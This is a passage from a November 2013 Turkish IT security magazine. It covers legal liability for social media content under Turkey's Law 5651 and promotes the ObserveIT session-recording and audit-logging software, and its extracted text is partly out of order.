rejime tabi olacağı ve İnternet içeriği sebebiyle hukuki ve cezai sorumluluk çeşitli davalarda tartışılmaya başlanmıştır. Algılama ve belirsizlik süresi olarak nitelendirebileceğimiz bu ikinci safhanın 2006
yılının sonuna kadar devam ettiğini söyleyebiliriz. Bu aşamada
İnternet içeriği nedeniyle hukuki sorumluluk İnternete özel bir yasal
düzenlemeyle değil, mevcut yasal düzenlemelerin İnternete uygulanması suretiyle gerçekleşmiştir.
Üçüncü safha ise 2006 yılından bugüne devam eden safhadır. Bu
safhanın odak noktasını bilişim suçları ve çocuk pornografisi
tartışmaları oluşturmaktadır. Bilişim suçlarının ve İnternet üzerinden
yayılan çocuk pornografisinin oluşturduğu
tehlikenin medyada uzun süre gündem
oluşturması, bu konuda özel bir yasal
düzenlemeye gidilmesi
konusunda önemli
bir reform dinamiği
olmuştur. Bu doğrultuda farklı kanun tasarı ve teklifleri hazırlanmış-
tır. Tüm bu çalışmalar 4 Mayıs 2007 tarihinde kabul edilen 5651
sayılı İnternet Ortamında Yapılan Yayınların Düzenlenmesi ve Bu
Yayınlar Yoluyla İşlenen Suçlarla Mücadele Edilmesi Hakkında Kanun
altında toplanmıştır. Bu kanun 23 Mayıs 2007 tarihli resmi gazetede
yayımlanmak suretiyle yürürlüğe girmiştir.
5651 sayılı Kanun iki temel hususu düzenlemektedir. 5651 sayılı
Kanun düzenlediği ilk konu, içerik, yer ve erişim sağlayıcı gibi temel
İnternet aktörlerinin sorumluluk rejimidir. İkinci ana konu ise belli
suç tiplerine ilişkin içerik barındıran web sitelerine erişimin nasıl engelleneceğidir. 5651 sayılı Kanunun içerik sağlayıcılara ilişkin getirdiği
hüküm sosyal medya paylaşımları sebebiyle hukuki sorumluluğun
tespitinde önem taşımaktadır.
5651 sayılı Kanun içerik sağlayıcıyı İnternet ortamında kullanıcılara
her türlü bilgi veya veriyi üreten, değiştiren ve sağlayan gerçek veya
tüzel kişiler olarak tanımlamıştır. İçerik sağlayıcının sorumluluğu 4.
madde altında şu şekilde düzenlenmiştir:
yıcısının, işlenen suça iştirakten dolayı sorumlu olacağı belirtilmiştir.
Suçta ve cezada kanunilik ilkesi gereğince bu sorumluluk halinin
kanunda açıkça tanımlanması gerekmektedir. Bu hükme ilişkin herhangi bir içtihat da oluşmadığı için hükmün mahkemeler tarafından
nasıl yorumlanacağı belirsizliğini korumaktadır. Kanunun sorumluluk
esasını yoruma açık bir şekilde tanımlaması sebebiyle, bağlantı
sağlanan içerikten dolayı sorumluluk somut olayın özelliklerine göre
belirlenecektir. Sosyal medya sitelerinde bu durum içinden çıkılamaz
sorunlar oluşturabilecektir. Tekrar paylaşım olanağı sayesinde sosyal
medya siteleri içeriğin İnternet ortamında çok hızlı bir şekilde yayılmasını olanaklı kılmaktadır. Bu durumda eşitlik ilkesi gereğince ya
tüm içerik sağlayıcılarının sorumluluğuna gidilecek ya da suçta ve
cezada şahsilik ilkesi gereğince sadece içeriği oluşturan veya
bağlantının sahibi olan kişi sorumlu tutulacaktır.
Sosyal medya paylaşımları sebebiyle hukuki sorumluluk şu şekilde
özetlenebilir:
Madde 4 - (1) İçerik sağlayıcı, internet ortamında kullanıma sunduğu
her türlü içerikten sorumludur.
• İnternet kullanıcılarının sosyal medyada paylaştıkları kendilerine
ait içerik dolayısıyla hem hukuki hem de cezai sorumlulukları vardır.
(2) İçerik sağlayıcı, bağlantı sağladığı başkasına ait içerikten sorumlu
değildir. Ancak, sunuş biçiminden, bağlantı sağladığı içeriği benimsediği
ve kullanıcının söz konusu içeriğe ulaşmasını amaçladığı açıkça belli
ise genel hükümlere göre sorumludur.
• Başkasına ait içeriği sunma durumunda ise, 5651 sayılı Kanun dair
yorumlanırsa bu içerik sebebiyle de kural olarak İnternet kullanıcılarının
hem hukuki hem de cezai sorumluluğu olacaktır.
Görüldüğü üzere kanun içerik sağlayıcının İnternet ortamında kullanıma sunduğu her türlü içerikten sorumlu olacağını düzenlemiştir.
İçerik sağlayıcının bu doğrultuda "ürettiği, değiştirdiği veya sağladığı"
her türlü içerikten dolayı hem cezai hem de hukuki sorumluluğu
bulunmaktadır. Öte yandan 5651 sayılı Kanun, içerik sağlayıcının
bağlantı sağladığı başkasına ait içerikten belirli şartlar altında sorumlu
olacağını kabul etmiştir. Sorumluluğa ilişkin tek ayrım içerik sağlayıcının
bağlantı sağladığı durumlar için öngörülmüştür. 5651 sayılı Kanun,
içerik sağlayıcının bağlantı sağladığı başkasına ait içerikten belirli
şartlar altında sorumlu olacağını kabul edilmiştir. Sorumluluğun doğmasını belirleyen temel faktör
bağlantılı içeriğin sunuluş biçimidir. Eğer ki,
sunuş biçiminden bağlantı sağlanan
içeriğin benimsendiği
veya kullanıcıların
bu içeriğe ulaşmasını amaçlandığı
açık bir şekilde belli
oluyorsa, içerik sağlayıcı bu tür içerikten
genel hükümlere göre
sorumlu tutulacaktır. Kanunda genel hükümlerden neyin kastedildiği belirlenmemiştir. 5651 sayılı Kanunun gerekçesinde bağlantı
sağlanan içeriğin suç
oluşturması halinde,
bu içeriğe bağlantı sağlayan içerik sağla-
• Bağlantıyı sunuş biçimden bağlantı sağlanan içeriğin benimsendiği
veya kullanıcıların bu içeriğe ulaşmasının amaçlandığı açık bir şekilde
belli oluyorsa, içerik sağlayıcı bu tür içerikten genel hükümlere göre
sorumlu tutulacaktır. Ancak 5651 sayılı kanun genel hükümlere
göre sorumluluğun kapsamı hakkında açıklayıcı değildir. İçerik sebebiyle cezai sorumluluk tespit edildiği andan itibaren sorumluluk
ve yaptırımlar, somut olayda paylaşılan içeriğe göre Türk Ceza Kanununa göre belirlenecektir.
• Öte yandan, gönderi beğenme gibi durumlarda irade beyanının
yeterince tespiti mümkün olmadığı için, bu sebeple hukuki ve cezai
sorumluluğun doğacağını ileri sürmek mümkün
değildir.
Görülmektedir ki Türk hukukunda sosyal
medya paylaşımları sebebiyle hukuki sorumluluğun esasları
muğlak hükümlerle
düzenlenmiştir. Bu
konuda yeterince yargı içtihadı olmadığı için,
sorumluluk rejiminin sınırlarını kesin bir
şekilde çizmek
mümkün değildir.
Kasım 2013 beyaz şapka 21
İrfan Kotman
[email protected]
Observe IT /Sisteminizdeki
Güvenlik Kamera Sistemi
Yasal zorunluluklar, standrat uyumlulukları, sistemlerinizde bilerek yada bilmeyerek meydana gelen kayıpların tespiti ve daha bir çok nedenle tutulan loglar ve
bu loglar içinde kanıt bulmak için samanlıkta iğne arayan BT çalışanları.
Şirketleri bu zorluğu görerek daha kolay kanıt bulunabilecek ve uyumluluk
raporu oluştabilecek yazılımlar ortaya çıkarmaya başladılar.
S
unucunuzda bilginiz dışında bir dosyanız silindi, sistemlerinizde yapılan bir konfigurasyon değişikliği sonucu sisteminizde
kesintiler yaşadınız. Sunucuya bağlı kullanıcıların yaptığı işlemleri detaylı olarak bilmek istiyorsunuz. Onlarca log arasından
gerekli bilginin nerede olduğunu bulmanın zorluğunu yaşıyorsunuz.
ve istediğiniz zaman oturum üzerinde yapılan bütün hareketleri
izleyebilirsiniz. Otomatik uygulama öğrenme özelliği sayesinde
istediğiniz uygulamaları kaydedebilir veya kayıt harici bırakabilir,
bazı uygulamalar üzerindenki kayıtlarını sadece yazılı olarak
Observe IT üzerinde tutulmasını sağlayabilirsiniz.
Yapılan araştırmalar sistemler tarafından alınan logların sadece %
5 lik kısmının değerlendirildiği % 95 lik kısmının içindekiler ile
beraber kaybolduğu ortaya koymaktadır. Bu kaybın engellenmesi
firmalar farklı çözümleri ortaya koymaya başlamışlardır.
Observe IT yazılımı bu noktada farklı bir çözümle ortaya çıkmıştır.
Adli vaka olaylarında olduğu gibi çözüme en kolay ve en kesin
deliller ile götürecek yöntemin, olayın meydana geldiği andaki
video kayıtları olduğu düşünülerek ,aynı mantığı bilişim sistemleri
üzerine taşımış ve işletim sistemleriniz üzerinde video kaydı yapabilen bir teknoloji geliştirmiştir.
Observe IT
Observe IT yazılımı temel olarak sunucularınız üzerinde kullanıcılarınız tarafından yapılan her hareketi video olarak kaydeder ve
video ile ilgili yazılı ve datylı bir kayıt oluşturur. Observe IT yardımı
ile tüm uzak erişim bağlantılarınızı, Windows konsol ve Unix
oturum bağlantılarınızı RDP, ICA, VMWare, SSH, Telnet ve daha
fazlasını kaydedebilir ve tek bir merkezi yönetim konsolu üzerinde
izleyebilir ve raporlayabilirsiniz.
Windows
Observe IT Yazılımının Özellikleri
Kurulum ve kullanım kolaylığı
Observe IT yazılımını 10 dakika içinde sisteminize kurabilir ve
kolayca öğrenebilen , yönetebilen merkezi yönetim yazılımı sayesinde kolayca gerekli kayıtlara ulaşabilirsiniz.
Windows, Unix ve Citrix üzerindeki oturumları anlık kaydetme
ve izleyebilme
Sunucularınız üzerindeki tüm kullanıcı oturumlarınızı kaydedebilir
22 beyaz şapka Kasım 2013
Unix
Kolayca istediğiniz videoya ulaşma
Observe IT üzerindeki kayıtlarınız üzerinde kullanıcı, uygulama,komut, dosya ,URL v.b bir çok parametreye göre arama yapabilir ve
kolayca ilgili kayıtlara ulaşabilir ve izleyebilirsiniz.
Kullanıcı mesajları oluşturabilme,
Uzak erişim yapan kullanıcı oturumlarında sunucu ile ilgili bütün
bilgilendirmeleri mesaj olarak kullanıcı oturumlarında yayınlayabilirsiniz.
Observe IT Agent Geniş İşletim Sistemi Desteği
Observe IT yazılımı hemen hemen bütün Windows işletim
sistemleri ve birçok Unix işletim sistemi üzerinde kayıt yapma
İkincil kimlik doğrulama
Sunucularınız üzerinde birden çok kullanıcı tarafından kullanılan
hesaplara sahipsiniz. Örnek olarak sunucu üzerinde bulunan “administrator” kullanıcısı bir kaç çalışanınız tarafından kullanılıyor.
Observe IT üzerinde bulunan ikinci kimlik doğrulama ile sunucunuza
bağlanan “administrator” kullanıcısına, Active Directory kullanıcı
ismi yada Observe IT üzerinde oluşturulan özel kullanıcı adı ve
şifresi ile ikincil bir kimlik sorgusu yapabilirsiniz.
şansı sağlamaktadır. Desteklediği işletim sistemleri ( 32 bit ve 64bit) örneklerini aşağıda görebilirsiniz.
• Microsoft Windows Server 2003/2003 R2/2008/2008 R2/Windows 2012
• Windows XP Pro/Vista/Windows 7/ Windows 8
• Solaris 10
Raporlama
Kullanıcı, uygulama,komut, dosya ,URL v.b bir çok parametreye
göre raporlar oluşturabilir ve ilgili raporların ve raporlar üzerindeki
kayıtların, Observe IT kullanıcılarına e-posta atılarak ilgili oturumları
kolayca seyretmelerini sağlayanabilmektedir.
Uyumluluklar
Observe IT ile PCI/HIPAA/SOX/ISO gibi uyumlulukların karşılayalamada gerekli çözüm olarak kullanabilirsiniz. Örneğin PCI maddelerinin 8, 10.1 ,10.2 ,10.3 ve 12 maddelerinin karşılanmasında
Observe IT yazılımını kullanılabilmektedir.
3. parti yazılım desteği
SSH, Telnet, Terminal Services, Citrix, Remote Desktop, PCAnywhere, VMware, VNC, Dameware v.b. üzerinden yapılan bütün
uzak oturumları ObserveIT kayıt etme özelliğine sahiptir.
• • AIX 5.3 , AIX 6.1
• RHEL/CentOS 5.0-5.7 ve 6.0-6.2
• SuSE 10 SP2-SP4, SuSE 11 SP2
• Ubuntu 10.04 ,12.04
HP-UX versions 11.23 and 11.31 ve Oracle Linux 5.0-5.8-6.0-6.3
ObserveIT yukarıda kısaca bahsettiğimiz özellikler sayesinde etkili
bir loglama ve kanıt sunma çözümü olarak sektördeki yerini almıştır.
Observe IT ını http://www.observeit-sys.com/ adresinden 15
günlük deneme sürümünü indirebilir, ürün ile ilgili detaylara ulaşabilirsiniz.
Kasım 2013 beyaz şapka 23
26 Kasım 2013 Salı
Point Hotel Barbaros
Web: http://www.nebulabilisim.com.tr/BS13
Kayıt: http://beyazsapka13.eventbrite.com
Beyaz Şapka’ya katkılarından dolayı tüm sponsorlarımıza ve yazarlarımıza teşekkür ederiz.
Yayınlanan yazıların ve görsellerin tüm sorumluluğu yazarlarına aittir.

Benzer belgeler

DMO McAfee Ürünleri Listesi

DMO McAfee Ürünleri Listesi çalışıyoruz ama hiç bilmeyenler için kısaca özetleyeyim. McAfee Focus bilgi güvenliği dünyası için tasarlanmış bir konferans. Konferansın iş ortakları ve son kullanıcılar için iki farklı bölümü

Detaylı